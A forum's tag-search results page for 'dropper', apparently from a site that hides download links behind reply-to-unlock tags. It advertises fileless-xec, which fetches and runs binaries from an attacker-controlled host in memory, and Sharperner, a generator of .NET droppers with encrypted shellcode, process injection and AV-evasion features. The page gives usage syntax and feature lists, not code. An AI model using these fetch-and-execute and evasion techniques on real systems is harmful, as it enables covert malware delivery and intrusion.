Search the Community
Showing results for tags 'dropper'.
-
Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine Short story fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk simple usage fileless-xec <binary_url> execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url> retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url> detach program execution from tty: setsid fileless-xec […] Changelog v3.1 Add icmp server: Transfer binary content with ICMP (used QueenSono) stdout and stdin in real-time for “unstealth” mode stdout in real time for windows executable [hide][Hidden Content]]
-
- fileless-xec
- v3.1
-
(and 2 more)
Tagged with:
-
fileless-xec – A stealth dropper Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine Short story fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk simple usage fileless-xec <binary_url> execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url> retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url> detach program execution from tty: setsid fileless-xec […] 3.0.0 Latest Changed Rebranding from curlNexecto fileless-xec Added Self remove of fileless-xec dropper Server mode Windows support Exec without using memfd syscall [hide][Hidden Content]]
-
- fileless-xec
- v3.0.0
-
(and 2 more)
Tagged with:
-
[hide][Hidden Content]] Scan Server [Hidden Content]
-
Sharperner Sharperner is a tool written in CSharp that generates a .NET dropper with AES and XOR obfuscated shellcode. A generated executable can possibly bypass signature check but I can’t be sure it can bypass heuristic scanning. Features PE binary Process Hollowing PPID Spoofing Random generated AES key and iv Final Shellcode, Key, and IV are translated to morse code 🙂 .NET binary AES + XOR encrypted shellcode APC Process Injection (explorer.exe) Random function names Random generated AES key and iv Final Shellcode, Key, and IV are translated to morse code 🙂 [hide][Hidden Content]]
-
- 2
-
- sharperner:
- generate
-
(and 8 more)
Tagged with: